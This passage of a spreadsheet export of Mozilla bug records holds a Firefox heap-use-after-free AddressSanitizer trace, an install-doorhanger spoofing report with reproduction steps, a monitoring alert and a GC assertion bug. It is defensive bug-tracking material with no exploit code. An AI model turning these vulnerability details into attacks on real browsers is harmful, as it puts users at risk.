    #2 0x7f7ffe67ef69 in mozilla::dom::VideoDocument::StartLayout() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:73:17
    #3 0x7f7ffe64f46d in mozilla::dom::MediaDocumentStreamListener::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:55:14
    #4 0x7f7ff8ab986c in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:311:34
    #5 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #6 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStruct const&amp;, bool const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #7 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #8 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #9 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, short const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStruct const&amp;, bool const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #10 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #11 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #12 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #13 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #14 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #15 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #16 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #20 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7f80008e24a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7f8004f5f10e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7f8004f5dc51 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x55bf9ba64113 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x55bf9ba64113 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7f801af30b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x55bf9b98564c in _start (/home/nils/browser/firefox/firefox/firefox+0x4564c)
0x60d00009e8e0 is located 0 bytes inside of 136-byte region [0x60d00009e8e0,0x60d00009e968)
freed by thread T0 (Web Content) here:
    #0 0x55bf9ba30ce2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f7ff5c97378 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7f7ff5c97378 in SnowWhiteKiller::Visit(nsPurpleBuffer&amp;, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7f7ff5c6afb3 in void nsPurpleBuffer::VisitEntries&lt;SnowWhiteKiller&gt;(SnowWhiteKiller&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:956:27
    #4 0x7f7ff5c6c6d8 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&amp;) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7f7ff83f525c in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7f7ff5ecdf62 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #8 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7f80003af2e3 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909:31)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #10 0x7f80003af2e3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*, bool) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909
    #11 0x7f80003acf5a in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable&lt;mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2727:11
    #12 0x7f7ffcac17cd in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1346:24
    #13 0x7f7ffd8fc222 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3181:13
    #14 0x7f800523e8a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #15 0x7f800523e8a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #16 0x7f800521ee80 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #17 0x7f800521ee80 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
    #18 0x7f80052085e8 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #19 0x7f800523f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #20 0x7f80052415d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #21 0x7f8005faa7cf in js::ForwardingProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #22 0x7f8005f66d11 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #23 0x7f8005f89c8d in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:504:19
    #24 0x7f800523fa75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:14
    #25 0x7f80052415d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #26 0x7f8005ed3cc8 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2658:10
    #27 0x7f7ffced92fe in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #28 0x7f7ffe197924 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #29 0x7f7ffe197924 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1024
    #30 0x7f7ffe199847 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
    #31 0x7f7ffe17a161 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #32 0x7f7ffe17a161 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #33 0x7f7ffe178875 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:587:14
    #34 0x7f7ffe17f104 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #35 0x7f7ffe186e4b in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
previously allocated by thread T0 (Web Content) here:
    #0 0x55bf9ba31063 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55bf9ba65dcd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f7ffe42be4b in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f7ffe42be4b in NS_NewHTMLBodyElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLBodyElement.cpp:24
    #4 0x7f7ffe660643 in mozilla::dom::MediaDocument::CreateSyntheticDocument() /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:235:39
    #5 0x7f7ffe67fa3a in mozilla::dom::VideoDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:89:30
    #6 0x7f7ffa148eac in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2169:14
    #7 0x7f8001190c8a in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:967:22
    #8 0x7f800118fc0c in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:718:10
    #9 0x7f8004044f60 in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8551:7
    #10 0x7f8004043b51 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6387:17
    #11 0x7f8003fcb7c4 in nsDocShell::CreateContentViewer(nsTSubstring&lt;char&gt; const&amp;, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8354:3
    #12 0x7f8003fc84aa in nsDSURIContentListener::DoContent(nsTSubstring&lt;char&gt; const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:183:20
    #13 0x7f7ff8abe983 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:748:18
    #14 0x7f7ff8abafb4 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:420:30
    #15 0x7f7ff8ab9666 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:299:8
    #16 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #17 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStruct const&amp;, bool const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #18 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #19 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #20 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, mozilla::net::ParentLoadInfoForwarderArgs const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, unsigned long const&amp;, int const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, nsTString&lt;char&gt; const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, short const&amp;, unsigned int const&amp;, nsTString&lt;char&gt; const&amp;, long const&amp;, bool const&amp;, bool const&amp;, bool const&amp;, mozilla::net::ResourceTimingStruct const&amp;, bool const&amp;) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #21 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #22 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #23 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #24 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #25 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #26 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #27 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #28 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #29 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #30 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12 in AppendChildTo
Shadow bytes around the buggy address:
  0x0c1a8000bcc0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1a8000bcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1a8000bce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a8000bcf0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a8000bd00: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c1a8000bd10: 00 00 00 fa fa fa fa fa fa fa fa fa[fd]fd fd fd
  0x0c1a8000bd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a8000bd30: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd40: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1a8000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd60: fd fd fa fa fa fa fa fa fa fa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12771==ABORTING
```</t>
        </is>
      </c>
      <c r="X4854" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4855">
      <c r="A4855" t="n">
        <v>771294</v>
      </c>
      <c r="B4855" t="inlineStr">
        <is>
          <t>2012-07-05 13:10:13 -0700</t>
        </is>
      </c>
      <c r="C4855" t="inlineStr">
        <is>
          <t>Install App doorhanger remains visible when installing page immediately loads another page</t>
        </is>
      </c>
      <c r="D4855" t="inlineStr">
        <is>
          <t>2016-02-04 15:00:27 -0800</t>
        </is>
      </c>
      <c r="E4855" t="n">
        <v>1</v>
      </c>
      <c r="F4855" t="n">
        <v>1</v>
      </c>
      <c r="G4855" t="n">
        <v>6</v>
      </c>
      <c r="H4855" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4855" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J4855" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="K4855" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L4855" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4855" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4855" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4855" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4855" t="inlineStr">
        <is>
          <t>[adv-main26+]</t>
        </is>
      </c>
      <c r="Q4855" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4855" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4855" t="inlineStr">
        <is>
          <t>Firefox 26</t>
        </is>
      </c>
      <c r="T4855" t="n">
        <v>1</v>
      </c>
      <c r="U4855" t="n">
        <v>0</v>
      </c>
      <c r="V4855" t="n">
        <v>43</v>
      </c>
      <c r="W4855" t="inlineStr">
        <is>
          <t>If a page loads another page right after calling navigator.mozApps.install, the Install App doorhanger doesn't disappear when the browser tab's location changes, which could enable a malicious page to fool a user into thinking they're installing an app from a different page than the one that actually triggered the install.
Steps To Reproduce:
1. go to http://www.mykzilla.org/app/
2. press the "install, then redirect immediately" button
Expected Results: the doorhanger appears and then immediately disappears (perhaps too quickly to see it at all) as the tab starts loading about:blank.
Actual Results: the doorhanger appears, the tab loads about:blank, and the doorhanger remains visible.
In theory, the doorhanger should disappear when the location changes, because XULBrowserWindow.onLocationChange calls PopupNotifications.locationChange, which closes doorhangers unless they set persistWhileVisible, and webappsUI doesn't do that &lt;http://hg.mozilla.org/mozilla-central/file/b39f4007be5a/browser/modules/webappsUI.jsm#l139&gt;.
So perhaps the location change races the notification?  If the installing page waits a second before redirecting the user to about:blank, the doorhanger closes as expected (see the "call install, then redirect after one second" button in my test app for an example of this).</t>
        </is>
      </c>
      <c r="X4855" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4856">
      <c r="A4856" t="n">
        <v>1230171</v>
      </c>
      <c r="B4856" t="inlineStr">
        <is>
          <t>2015-12-03 07:41:46 -0800</t>
        </is>
      </c>
      <c r="C4856" t="inlineStr">
        <is>
          <t>treeherder-rabbitmq1.private.scl3.mozilla.com:Rabbit Unread Messages is CRITICAL: RABBITMQ_OVERVIEW CRITICAL - messages CRITICAL (5031) messages_ready CRITICAL (4919),</t>
        </is>
      </c>
      <c r="D4856" t="inlineStr">
        <is>
          <t>2015-12-05 11:22:36 -0800</t>
        </is>
      </c>
      <c r="E4856" t="n">
        <v>1</v>
      </c>
      <c r="F4856" t="n">
        <v>1</v>
      </c>
      <c r="G4856" t="n">
        <v>7</v>
      </c>
      <c r="H4856" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4856" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4856" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4856" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4856" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4856" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4856" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4856" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4856" t="inlineStr"/>
      <c r="Q4856" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4856" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4856" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4856" t="n">
        <v>1</v>
      </c>
      <c r="U4856" t="n">
        <v>0</v>
      </c>
      <c r="V4856" t="n">
        <v>6</v>
      </c>
      <c r="W4856" t="inlineStr">
        <is>
          <t>7:17 AM &lt;@nagios-scl3&gt; (IRC) Thu 07:17:31 PST [5479] treeherder-rabbitmq1.private.scl3.mozilla.com:Rabbit Unread Messages is CRITICAL: RABBITMQ_OVERVIEW CRITICAL - messages CRITICAL (5031) messages_ready CRITICAL (4919), messages_unacknowledged OK (112) (http://m.mozilla.org/Rabbit+Unread+Messages)</t>
        </is>
      </c>
      <c r="X4856" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4857">
      <c r="A4857" t="n">
        <v>1847397</v>
      </c>
      <c r="B4857" t="inlineStr">
        <is>
          <t>2023-08-05 13:40:29 -0700</t>
        </is>
      </c>
      <c r="C4857" t="inlineStr">
        <is>
          <t>Assertion failure: kind == JS::TracerKind::Tenuring || kind == JS::TracerKind::MinorSweeping || kind == JS::TracerKind::Moving, at gc/Marking.cpp:137</t>
        </is>
      </c>
      <c r="D4857" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:26 -0700</t>
        </is>
      </c>
      <c r="E4857" t="n">
        <v>1</v>
      </c>
      <c r="F4857" t="n">
        <v>1</v>
      </c>
      <c r="G4857" t="n">
        <v>3</v>
      </c>
      <c r="H4857" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4857" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4857" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K4857" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4857" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4857" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4857" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4857" t="inlineStr">
        <is>
          <t>[fixed in 118 by bug 1847017] [adv-main117+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q4857" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4857" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4857" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T4857" t="n">
        <v>1</v>
      </c>
      <c r="U4857" t="n">
        <v>0</v>
      </c>
      <c r="V4857" t="n">
        <v>22</v>
      </c>
